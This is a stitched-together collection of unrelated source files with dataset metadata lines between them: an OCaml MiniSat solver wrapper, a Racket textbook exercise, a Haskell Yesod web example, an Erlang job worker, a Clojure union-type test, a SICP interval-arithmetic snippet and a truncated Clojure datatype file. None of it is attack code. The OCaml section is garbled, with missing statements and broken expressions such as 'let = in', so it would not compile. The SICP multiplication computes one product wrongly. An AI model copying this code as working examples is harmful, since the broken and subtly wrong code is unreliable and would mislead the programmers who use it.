if !is_minisat_running then (
let () = print_string (reason ^ " Restarting minisat after ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in
PrvComms.restart start stop
)
else (
let () = print_string (reason ^ " not restarting minisat ... " ^ (string_of_int !minisat_call_count) ^ " invocations ") in ()
)
let check_problem_through_file (input: string) (timeout: float) : bool =
let file_suffix = Random.int 1000000 in
let infile = "/tmp/in" ^ (string_of_int file_suffix) ^ ".cnf" in
let out_stream = open_out infile in
output_string out_stream input;
close_out out_stream;
let minisat_result="minisatres.txt" in
let set_process proc = minisat_process := proc in
let fnc () =
if (minisat_input_format = "cnf") then (
PrvComms.start (minisat_name, minisat_path, [|minisat_arg;infile;minisat_result|]) set_process;
minisat_call_count := !minisat_call_count + 1;
let (prover_output, running_state) = get_answer !minisat_process.PrvComms.inchannel in
is_minisat_running := running_state;
prover_output;
)
else failwith "[minisat.ml] The value of minisat_input_format is invalid!" in
let res =
try
let fail_with_timeout () = restart ("[minisat]Timeout when checking sat!" ^ (string_of_float timeout)); false in
let res = PrvComms.maybe_raise_and_catch_timeout fnc () timeout fail_with_timeout in
res
Printexc.print_backtrace stdout;
print_endline ("WARNING: Restarting prover due to timeout");
Unix.kill !minisat_process.PrvComms.pid 9;
ignore (Unix.waitpid [] !minisat_process.PrvComms.pid);
false
) in
let () = PrvComms.stop !minisat_process 0 9 in
remove_file infile;
res
let cnf_to_string var_cnt f : string =
let fct l = String.concat " " (List.map (fun (c,b)-> if b then string_of_int c else ("-"^(string_of_int c))) l) in
"p cnf "^(string_of_int var_cnt)^" "^ (string_of_int (List.length f))^"\n"^
(String.concat " 0\n" (List.map fct f))^" 0\n"
~v1| v2 | v3
let xorc sv1 sv2 = [[(sv1, true);(sv2,true)];[(sv1, false);(sv2,false)]]
let trans_vv sv1 sv2 = [[(sv1, true);(sv2,false)];[(sv1, false);(sv2,true)]]
let negVar v f = List.map (List.map (fun (c,b)-> if c=v then c,not b else c,b)) f
let rec tauto l = match l with
| [] -> false
| (c,b)::t-> (List.exists (fun (v,b1)-> c=v && b<>b1) t) || (tauto t)
let neg_f f =
let f = List.map (List.map (fun (c,b)-> c,not b)) f in
if f=[] then f
else List.fold_left (fun a c->
let r = List.concat (List.map (fun c-> List.map (fun d-> c::d) a) c) in
List.filter (fun c->not (tauto c)) r) (List.map (fun c-> [c]) (List.hd f)) (List.tl f)
let mkOr f1 f2 =
let l = List.map (fun l -> List.map (fun l2 -> l@l2) f2) f1 in
List.filter (fun c-> not (tauto c)) (List.concat l)
let mkExists vl f =
let fv = List.fold_left (fun a c-> a@ (List.map fst c)) [] f in
let vl = List.filter (fun c-> List.mem c fv) vl in
List.fold_left (fun f v-> mkOr f (negVar v f)) f vl
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst) (c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found -> (tp:= !tp+1; Hashtbl.add ht v !tp;!tp) in
let trans_eq (v1,v2,c) = match c with
| C_top -> xorc (get_var v1) (get_var v2)
| PVar v3-> xor (get_var v1) (get_var v2) (get_var v3) in
let ante_f =
let eqs = List.map trans_eq a_l_eqs in
let a_ev = List.map get_var a_ev in
mkExists a_ev (List.concat (nz::eqs)) in
let conseq_f =
let c_ev = List.map get_var c_ev in
let eqs = List.map trans_eq c_l_eqs in
let c_subst = List.map (fun (v1,v2) -> trans_vv (get_var v1)(get_var v2)) c_subst_vars in
let c_const = List.map (fun (v,b) -> [[(get_var v, b)]]) c_const_vars in
let r = List.concat (nz::eqs@c_subst@c_const) in
let r = List.map (List.filter (fun (c,_)-> not (List.mem c c_ev))) (neg_f r) in
List.filter (fun c-> c<>[]) r in
let all_f = ante_f@conseq_f in
if all_f<>[] then
not (check_problem_through_file (cnf_to_string !tp (ante_f@conseq_f)) 0.)
else true
let call_imply (a_ev:t_var list) (a_nz_cons:nz_cons) (a_l_eqs:eq_syst)
(c_ev:t_var list) (c_nz_cons:nz_cons) (c_l_eqs:eq_syst) (c_const_vars:(t_var*bool) list) (c_subst_vars:(t_var*t_var) list):bool =
let nzsf l = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) l ) in
let pr_list f l = String.concat " \n " ( List.map f l ) in
let pr_pair f1 f2 ( ) = " ( " ^(f1 x1)^","^(f2 x2)^ " ) " in
let anzs = nzsf a_nz_cons in
let cnzs = nzsf c_nz_cons in
let aeqss = string_of_eq_l a_l_eqs in
let = in
print_string ( " MINISAT IMPLY\n ante : nz : " ^anzs^";\n ex : " ^(pr_list Sv.string_of a_ev)^";\n eqs : " ^aeqss^";\n " ) ;
print_string ( " conseq : nz : " ^cnzs^";\n ex : " ^(pr_list Sv.string_of c_ev)^";\n veq : " ^cvel^";\n cons : " ^consl^";\n eqs : " ^ceqss^";\n " ) ;
let r = call_imply a_ev a_nz_cons a_l_eqs c_ev c_nz_cons c_l_eqs c_const_vars c_subst_vars in
( " r : " ^(string_of_bool r ) ) ;
r
let call_sat non_zeros eqs =
let ht = Hashtbl.create 20 in
let tp = ref 0 in
let get_var v = let v = Sv.string_of v in try Hashtbl.find ht v with | Not_found ->
(tp:= !tp+1;
( v^ " " ^(string_of_int ! tp)^"\n " ) ;
let input =
let eqs = List.map ( fun (v1,v2,c)->
let sv1 = get_var v1 in
let sv2 = get_var v2 in
match c with
| C_top -> xorc sv1 sv2
| PVar v3-> xor sv1 sv2 (get_var v3) ) eqs in
List.concat (nz::eqs) in
if input<> [] then
let input_str = cnf_to_string !tp input in
( input_str^"\n " ) ;
check_problem_through_file input_str minisat_timeout_limit
else true
let call_sat non_zeros eqs =
let nzs = String.concat " , " ( List.map ( fun l- > " { " ^(String.concat " , " ( List.map Sv.string_of l))^ " } " ) non_zeros ) in
let = string_of_eq_l eqs in
let r = call_sat non_zeros eqs in
( " r : " ^(string_of_bool r)^"\n " ) ;
end;;
module Solver_Z3 = Share_prover.Dfrac_s_solver(Ts)(Share_prover.Sv)(Ss_Z3_proc)
module Solver_mini = Share_prover.Dfrac_s_solver(Share_prover.Ts)(Share_prover.Sv)(Ss_minisat_proc)
module Solver = Solver_mini
module Eqs =
struct
type var = Sv.t
type const = Ts.stree
type pcvar = Solver.frac_perm
type eq = Solver.eq
type eq_syst = Solver.eq_syst
let mkVar = Sv.var_of
let mkEq v1 v2 v3 = (v1,v2,v3)
let mkEqS l1 l2 l3 l4 l5= {Solver.eqs_ex = l1; Solver.eqs_nzv = l2; Solver.eqs_ve=l3; Solver.eqs_vc=l4; Solver.eqs_eql = l5}
let mkcFull = Ts.top
let mkcEmpty = Ts.bot
let mkcNode = Ts.mkNode
let mkpcCnst c = Solver.Cperm c
let mkpcVar v = Solver.Vperm v
end;;
type cmd =
| Sat of Eqs.eq_syst
| Imply of Eqs.eq_syst * Eqs.eq_syst;;
|
a033a05b7ad875363969db6a26cb9af8c6722080686ca9eb5bc06113361800bd | eareese/htdp-exercises | 140-all-true.rkt | #lang htdp/bsl
Exercise 140 . Design the function all - true , which consumes a list of Boolean values and determines whether all of them are # true . In other words , if there is any # false on the list , the function produces # false .
; A List-of-booleans is one of:
; – '()
; – (cons Boolean List-of-booleans)
; List-of-booleans -> Boolean
; determines whether all of the list items are true. If there is
; any #false on the list, the function produces #false.
(check-expect (all-true (cons #t '())) #t)
(check-expect (all-true (cons #t (cons #f '()))) #f)
(check-expect (all-true '()) #t)
(define (all-true alob)
(cond [(empty? alob) #t]
[(cons? alob)
(if (false? (first alob)) #f (all-true (rest alob)))]))
Now design one - true , a function that consumes a list of Boolean values and determines whether at least one item on the list is # true .
; List-of-booleans -> Boolean
determines whether AT LEAST ONE item on the list is # true .
(check-expect (one-true '()) #f)
(check-expect (one-true (cons #t '())) #t)
(check-expect (one-true (cons #t (cons #f (cons #f '())))) #t)
(check-expect (one-true (cons #f (cons #f (cons #t '())))) #t)
(check-expect (one-true (cons #f '())) #f)
(define (one-true alob)
(cond [(empty? alob) #f]
[(cons? alob)
(if (eq? #t (first alob)) #t (one-true (rest alob)))]))
| null | https://raw.githubusercontent.com/eareese/htdp-exercises/a85ff3111d459dda0e94d9b463d01a09accbf9bf/part02-arbitrarily-large-data/140-all-true.rkt | racket | A List-of-booleans is one of:
– '()
– (cons Boolean List-of-booleans)
List-of-booleans -> Boolean
determines whether all of the list items are true. If there is
any #false on the list, the function produces #false.
List-of-booleans -> Boolean | #lang htdp/bsl
Exercise 140 . Design the function all - true , which consumes a list of Boolean values and determines whether all of them are # true . In other words , if there is any # false on the list , the function produces # false .
(check-expect (all-true (cons #t '())) #t)
(check-expect (all-true (cons #t (cons #f '()))) #f)
(check-expect (all-true '()) #t)
(define (all-true alob)
(cond [(empty? alob) #t]
[(cons? alob)
(if (false? (first alob)) #f (all-true (rest alob)))]))
Now design one - true , a function that consumes a list of Boolean values and determines whether at least one item on the list is # true .
determines whether AT LEAST ONE item on the list is # true .
(check-expect (one-true '()) #f)
(check-expect (one-true (cons #t '())) #t)
(check-expect (one-true (cons #t (cons #f (cons #f '())))) #t)
(check-expect (one-true (cons #f (cons #f (cons #t '())))) #t)
(check-expect (one-true (cons #f '())) #f)
(define (one-true alob)
(cond [(empty? alob) #f]
[(cons? alob)
(if (eq? #t (first alob)) #t (one-true (rest alob)))]))
|
b4ec461ed5d7f937c300697d78732fcc76c30ae3460fe61fd4af2bed742ca5f0 | e-bigmoon/haskell-blog | RequestInformation.hs | #!/usr/bin/env stack
{- stack repl --resolver lts-15.4
--package text
--package yesod
-}
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE OverloadedStrings #
{-# LANGUAGE QuasiQuotes #-}
{-# LANGUAGE TemplateHaskell #-}
# LANGUAGE TypeFamilies #
import Data.List (sortOn)
import Data.Text (Text)
import Yesod
data Person = Person
{ personName :: Text
, personAge :: Int
}
people :: [Person]
people =
[ Person "Miriam" 25
, Person "Eliezer" 3
, Person "Michael" 26
, Person "Gavriella" 1
]
data App = App
mkYesod "App" [parseRoutes|
/ HomeR GET
|]
instance Yesod App
instance RenderMessage App FormMessage where
renderMessage _ _ = defaultFormMessage
getHomeR :: Handler Html
getHomeR = defaultLayout
[whamlet|
<p>
<a href="?sort=name">Sort by name
|
<a href="?sort=age">Sort by age
|
<a href="?">No sort
^{showPeople}
|]
showPeople :: Widget
showPeople = do
msort <- runInputGet $ iopt textField "sort"
let people' =
case msort of
Just "name" -> sortOn personName people
Just "age" -> sortOn personAge people
_ -> people
[whamlet|
<dl>
$forall person <- people'
<dt>#{personName person}
<dd>#{show $ personAge person}
|]
main :: IO ()
main = warp 3000 App
| null | https://raw.githubusercontent.com/e-bigmoon/haskell-blog/5c9e7c25f31ea6856c5d333e8e991dbceab21c56/sample-code/yesod/ch13/RequestInformation.hs | haskell | stack repl --resolver lts-15.4
--package text
--package yesod
# LANGUAGE QuasiQuotes #
# LANGUAGE TemplateHaskell # | #!/usr/bin/env stack
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE OverloadedStrings #
# LANGUAGE TypeFamilies #
import Data.List (sortOn)
import Data.Text (Text)
import Yesod
data Person = Person
{ personName :: Text
, personAge :: Int
}
people :: [Person]
people =
[ Person "Miriam" 25
, Person "Eliezer" 3
, Person "Michael" 26
, Person "Gavriella" 1
]
data App = App
mkYesod "App" [parseRoutes|
/ HomeR GET
|]
instance Yesod App
instance RenderMessage App FormMessage where
renderMessage _ _ = defaultFormMessage
getHomeR :: Handler Html
getHomeR = defaultLayout
[whamlet|
<p>
<a href="?sort=name">Sort by name
|
<a href="?sort=age">Sort by age
|
<a href="?">No sort
^{showPeople}
|]
showPeople :: Widget
showPeople = do
msort <- runInputGet $ iopt textField "sort"
let people' =
case msort of
Just "name" -> sortOn personName people
Just "age" -> sortOn personAge people
_ -> people
[whamlet|
<dl>
$forall person <- people'
<dt>#{personName person}
<dd>#{show $ personAge person}
|]
main :: IO ()
main = warp 3000 App
|
71121af594b68b89fc2410603cd4154c0331c18bdc0447131f2a8b41f6bf857f | bondy-io/bondy | bondy_jobs_worker.erl | %% =============================================================================
%% bondy_jobs_worker .erl -
%%
Copyright ( c ) 2016 - 2022 Leapsight . All rights reserved .
%%
Licensed under the Apache License , Version 2.0 ( the " License " ) ;
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% -2.0
%%
%% Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an " AS IS " BASIS ,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% =============================================================================
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-module(bondy_jobs_worker).
-behaviour(gen_server).
-include("bondy.hrl").
-define(SERVER_NAME(Index), {?MODULE, Index}).
-type execute_fun() :: fun(() -> any()).
-record(state, {
index :: integer()
}).
%% API
-export([start_link/1]).
-export([pick/1]).
-export([execute/2]).
-export([execute/3]).
-export([execute/4]).
-export([async_execute/2]).
-export([async_execute/3]).
GEN_SERVER
-export([code_change/3]).
-export([handle_call/3]).
-export([handle_cast/2]).
-export([handle_info/2]).
-export([init/1]).
-export([terminate/2]).
%% =============================================================================
%% API
%% =============================================================================
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
start_link(Index) ->
ServerName = {via, gproc, bondy_gproc:local_name(?SERVER_NAME(Index))},
gen_server:start_link(ServerName, ?MODULE, [?JOBS_POOLNAME, Index], []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec pick(RealmUri :: binary()) -> pid().
pick(RealmUri) when is_binary(RealmUri) ->
gproc_pool:pick_worker(?JOBS_POOLNAME, RealmUri).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(Server :: pid(), Fun :: execute_fun())->
ok.
execute(Server, Fun) ->
execute(Server, Fun, []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
execute(Server, Fun, Args) ->
execute(Server, Fun, Args, infinity).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec execute(
Server :: pid(),
Fun :: execute_fun(),
Args :: [any()],
Timetout :: timeout()) -> ok.
execute(Server, Fun, Args, Timeout) when is_function(Fun, length(Args) + 1) ->
gen_server:call(Server, {execute, Fun, Args}, Timeout).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec async_execute(Server :: pid(), Fun :: execute_fun()) ->
ok.
async_execute(Server, Fun) ->
async_execute(Server, Fun, []).
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
-spec async_execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
async_execute(Server, Fun, Args) ->
gen_server:cast(Server, {execute, Fun, Args}).
%% =============================================================================
GEN_SERVER
%% =============================================================================
init([PoolName, Index]) ->
%% We connect this worker to the pool worker name
WorkerName = ?SERVER_NAME(Index),
true = gproc_pool:connect_worker(PoolName, WorkerName),
State = #state{
index = Index
},
{ok, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_call({execute, Fun, []}, _From, State) ->
try
Fun()
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call({execute, Fun, Args}, _From, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call(Event, From, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event,
from => From
}),
{reply, {error, {unsupported_call, Event}}, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_cast({execute, Fun, []}, State) ->
try
Fun()
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast({execute, Fun, Args}, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast(Event, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event
}),
{noreply, State}.
%% -----------------------------------------------------------------------------
%% @doc
%% @end
%% -----------------------------------------------------------------------------
handle_info({'ETS-TRANSFER', _, _, _}, State) ->
%% The trie ets tables uses bondy_table_owner.
%% We ignore as tables are named.
{noreply, State};
handle_info({nodeup, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
{noreply, State};
handle_info({nodedown, _Node} = Event, State) ->
%% A connection with node has gone down
?LOG_DEBUG(#{
event => Event
}),
TODO deactivate ( keep a bloomfilter or list ) to filter
%% future searches or delete?
{noreply, State};
handle_info(Info, State) ->
?LOG_DEBUG(#{
reason => unexpected_event,
event => Info
}),
{noreply, State}.
terminate(normal, _State) ->
ok;
terminate(shutdown, _State) ->
ok;
terminate({shutdown, _}, _State) ->
ok;
terminate(_Reason, _State) ->
TODO publish metaevent
ok.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
| null | https://raw.githubusercontent.com/bondy-io/bondy/a1267e7e5526db24f278e12315020753f3168b44/apps/bondy/src/bondy_jobs_worker.erl | erlang | =============================================================================
bondy_jobs_worker .erl -
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
-2.0
Unless required by applicable law or agreed to in writing, software
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================================
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
API
=============================================================================
API
=============================================================================
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
=============================================================================
=============================================================================
We connect this worker to the pool worker name
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
@doc
@end
-----------------------------------------------------------------------------
The trie ets tables uses bondy_table_owner.
We ignore as tables are named.
A connection with node has gone down
future searches or delete? | Copyright ( c ) 2016 - 2022 Leapsight . All rights reserved .
Licensed under the Apache License , Version 2.0 ( the " License " ) ;
distributed under the License is distributed on an " AS IS " BASIS ,
-module(bondy_jobs_worker).
-behaviour(gen_server).
-include("bondy.hrl").
-define(SERVER_NAME(Index), {?MODULE, Index}).
-type execute_fun() :: fun(() -> any()).
-record(state, {
index :: integer()
}).
-export([start_link/1]).
-export([pick/1]).
-export([execute/2]).
-export([execute/3]).
-export([execute/4]).
-export([async_execute/2]).
-export([async_execute/3]).
GEN_SERVER
-export([code_change/3]).
-export([handle_call/3]).
-export([handle_cast/2]).
-export([handle_info/2]).
-export([init/1]).
-export([terminate/2]).
start_link(Index) ->
ServerName = {via, gproc, bondy_gproc:local_name(?SERVER_NAME(Index))},
gen_server:start_link(ServerName, ?MODULE, [?JOBS_POOLNAME, Index], []).
-spec pick(RealmUri :: binary()) -> pid().
pick(RealmUri) when is_binary(RealmUri) ->
gproc_pool:pick_worker(?JOBS_POOLNAME, RealmUri).
-spec execute(Server :: pid(), Fun :: execute_fun())->
ok.
execute(Server, Fun) ->
execute(Server, Fun, []).
-spec execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
execute(Server, Fun, Args) ->
execute(Server, Fun, Args, infinity).
-spec execute(
Server :: pid(),
Fun :: execute_fun(),
Args :: [any()],
Timetout :: timeout()) -> ok.
execute(Server, Fun, Args, Timeout) when is_function(Fun, length(Args) + 1) ->
gen_server:call(Server, {execute, Fun, Args}, Timeout).
-spec async_execute(Server :: pid(), Fun :: execute_fun()) ->
ok.
async_execute(Server, Fun) ->
async_execute(Server, Fun, []).
-spec async_execute(Server :: pid(), Fun :: execute_fun(), Args :: [any()]) ->
ok.
async_execute(Server, Fun, Args) ->
gen_server:cast(Server, {execute, Fun, Args}).
GEN_SERVER
init([PoolName, Index]) ->
WorkerName = ?SERVER_NAME(Index),
true = gproc_pool:connect_worker(PoolName, WorkerName),
State = #state{
index = Index
},
{ok, State}.
handle_call({execute, Fun, []}, _From, State) ->
try
Fun()
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call({execute, Fun, Args}, _From, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason ->
{error, Reason}
end,
{reply, ok, State};
handle_call(Event, From, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event,
from => From
}),
{reply, {error, {unsupported_call, Event}}, State}.
handle_cast({execute, Fun, []}, State) ->
try
Fun()
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast({execute, Fun, Args}, State) ->
try
erlang:apply(Fun, Args)
catch
_:Reason:Stacktrace ->
?LOG_ERROR(#{
description => "Error during async execute",
reason => Reason,
stacktrace => Stacktrace
})
end,
{noreply, State};
handle_cast(Event, State) ->
?LOG_WARNING(#{
reason => unsupported_event,
event => Event
}),
{noreply, State}.
handle_info({'ETS-TRANSFER', _, _, _}, State) ->
{noreply, State};
handle_info({nodeup, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
{noreply, State};
handle_info({nodedown, _Node} = Event, State) ->
?LOG_DEBUG(#{
event => Event
}),
TODO deactivate ( keep a bloomfilter or list ) to filter
{noreply, State};
handle_info(Info, State) ->
?LOG_DEBUG(#{
reason => unexpected_event,
event => Info
}),
{noreply, State}.
terminate(normal, _State) ->
ok;
terminate(shutdown, _State) ->
ok;
terminate({shutdown, _}, _State) ->
ok;
terminate(_Reason, _State) ->
TODO publish metaevent
ok.
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
|
db5731c31e101b0f27e105651bf063831df6603544ec84ad56ad0450d016b873 | lambdaisland/uniontypes | uniontypes_test.cljc | (ns lambdaisland.uniontypes-test
(:require [clojure.spec.alpha :as s]
[clojure.test :refer [deftest is testing]]
[lambdaisland.uniontypes #?(:clj :refer
:cljs :refer-macros) [case-of]]
[lambdaisland.uniontypes.core :refer [case-of*]]
#?(:cljs [cljs.core :refer [ExceptionInfo]]))
#?(:clj (:import clojure.lang.ExceptionInfo)))
(defn fail []
(throw (ex-info "This code should never be reached" {})))
(s/def ::availability (s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (s/tuple pos-int? pos-int?)
:announced string?))
(deftest case-of-test
(testing "happy path"
(is (= "Sold out."
(case-of ::availability :sold-out
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"that doesn't seem right")))
(is (= "That doesn't seem right."
(case-of ::availability {:not :valid}
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"That doesn't seem right."))))
(testing "Error messages"
(try
(case-of* '(::availability availability
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:foo x
"")
false)
(fail)
(catch ExceptionInfo e
(is (= #?(:clj (.getMessage e)
:cljs (.-message e)) "The cases in this `case-of` are different from the ones in the spec:
(s/def :lambdaisland.uniontypes-test/availability
(s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (tuple pos-int? pos-int?)
:announced string?))
Add a case for :announced.
Remove the case :foo.")
)))))
| null | https://raw.githubusercontent.com/lambdaisland/uniontypes/d290ad10f9126c0336446d88675d9fa57dc4ca55/test/lambdaisland/uniontypes_test.cljc | clojure | (ns lambdaisland.uniontypes-test
(:require [clojure.spec.alpha :as s]
[clojure.test :refer [deftest is testing]]
[lambdaisland.uniontypes #?(:clj :refer
:cljs :refer-macros) [case-of]]
[lambdaisland.uniontypes.core :refer [case-of*]]
#?(:cljs [cljs.core :refer [ExceptionInfo]]))
#?(:clj (:import clojure.lang.ExceptionInfo)))
(defn fail []
(throw (ex-info "This code should never be reached" {})))
(s/def ::availability (s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (s/tuple pos-int? pos-int?)
:announced string?))
(deftest case-of-test
(testing "happy path"
(is (= "Sold out."
(case-of ::availability :sold-out
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"that doesn't seem right")))
(is (= "That doesn't seem right."
(case-of ::availability {:not :valid}
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:announced date
(str "Will be available on: " date)
:spec/invalid _
"That doesn't seem right."))))
(testing "Error messages"
(try
(case-of* '(::availability availability
:sold-out _
"Sold out."
:in-stock amount
(str "In stock: " amount " items left.")
:reordered [min max]
(str "Available again in " min " to " max "days" )
:foo x
"")
false)
(fail)
(catch ExceptionInfo e
(is (= #?(:clj (.getMessage e)
:cljs (.-message e)) "The cases in this `case-of` are different from the ones in the spec:
(s/def :lambdaisland.uniontypes-test/availability
(s/or :sold-out #{:sold-out}
:in-stock pos-int?
:reordered (tuple pos-int? pos-int?)
:announced string?))
Add a case for :announced.
Remove the case :foo.")
)))))
| |
878752f5b3ee56cde9e519a75cc2defbf5e547e15375d65c2e6ccca7c6b073e3 | naoiwata/sicp | 2.1.4.scm | ;;
;; @author naoiwata
SICP Chapter2
;; 2.1.4 Extended Exercise: Interval Arithmetic
;;
(define (add-interval x y)
(make-interval
(+ (lower-bound x) (lower-bound y))
(+ (upper-bound x) (upper-bound y))))
(define (mul-interval x y)
(let
((p1 (* (lower-bound x) (lower-bound y)))
(p2 (* (lower-bound x) (upper-bound y)))
(p3 (* (upper-bound x) (lower-bound y)))
(p4 (* (upper-bound x) (lower-bound y))))
(make-interval
(min p1 p2 p3 p4)
(max p1 p2 p3 p4))))
(define (div-interval x y)
(mul-interval x
(make-interval
(/ 1.0 (upper-bound y))
(/ 1.0 (lower-bound y)))))
; END | null | https://raw.githubusercontent.com/naoiwata/sicp/7314136c5892de402015acfe4b9148a3558b1211/chapter2/pages/2.1.4.scm | scheme |
@author naoiwata
2.1.4 Extended Exercise: Interval Arithmetic
END | SICP Chapter2
(define (add-interval x y)
(make-interval
(+ (lower-bound x) (lower-bound y))
(+ (upper-bound x) (upper-bound y))))
(define (mul-interval x y)
(let
((p1 (* (lower-bound x) (lower-bound y)))
(p2 (* (lower-bound x) (upper-bound y)))
(p3 (* (upper-bound x) (lower-bound y)))
(p4 (* (upper-bound x) (lower-bound y))))
(make-interval
(min p1 p2 p3 p4)
(max p1 p2 p3 p4))))
(define (div-interval x y)
(mul-interval x
(make-interval
(/ 1.0 (upper-bound y))
(/ 1.0 (lower-bound y)))))
|
e28940010ce8fc564643531bc5cf8be99d5e633259f24d5c1ca4bf9652da4557 | cnuernber/dtype-next | primitive.clj | (ns tech.v3.datatype.primitive
(:require [tech.v3.datatype.protocols :as dtype-proto]
[tech.v3.datatype.casting :as casting]
[tech.v3.datatype.const-reader :refer [const-reader]]))
(defmacro implement-scalar-primitive
[cls prim-cls datatype]
`(do
(.put casting/class->datatype-map ~cls ~datatype)
(.put casting/class->datatype-map ~prim-cls ~datatype)
(clojure.core/extend
~cls
dtype-proto/PDatatype
{:datatype (fn [item#] ~datatype)}
dtype-proto/PElemwiseDatatype
{:elemwise-datatype (fn [item#] ~datatype)}
dtype-proto/PECount
{:ecount (fn [item#] 1)}
dtype-proto/PConstantTimeMinMax
{:has-constant-time-min-max? (constantly true)
:constant-time-min identity
:constant-time-max identity}
dtype-proto/PToReader
;;Reader conversion of primitives is inefficient so we allow it
;;but do not advertise it
{:convertible-to-reader? (constantly false)
:->reader (fn [item#]
(const-reader item# 1))})))
(implement-scalar-primitive Boolean Boolean/TYPE :boolean)
(implement-scalar-primitive Byte Byte/TYPE :int8)
(implement-scalar-primitive Short Short/TYPE :int16)
(implement-scalar-primitive Character Character/TYPE :char)
(implement-scalar-primitive Integer Integer/TYPE :int32)
(implement-scalar-primitive Long Long/TYPE :int64)
(implement-scalar-primitive Float Float/TYPE :float32)
(implement-scalar-primitive Double Double/TYPE :float64)
| null | https://raw.githubusercontent.com/cnuernber/dtype-next/4e43212942aafa0145640cf6b655bb83855f567d/src/tech/v3/datatype/primitive.clj | clojure | Reader conversion of primitives is inefficient so we allow it
but do not advertise it | (ns tech.v3.datatype.primitive
(:require [tech.v3.datatype.protocols :as dtype-proto]
[tech.v3.datatype.casting :as casting]
[tech.v3.datatype.const-reader :refer [const-reader]]))
(defmacro implement-scalar-primitive
[cls prim-cls datatype]
`(do
(.put casting/class->datatype-map ~cls ~datatype)
(.put casting/class->datatype-map ~prim-cls ~datatype)
(clojure.core/extend
~cls
dtype-proto/PDatatype
{:datatype (fn [item#] ~datatype)}
dtype-proto/PElemwiseDatatype
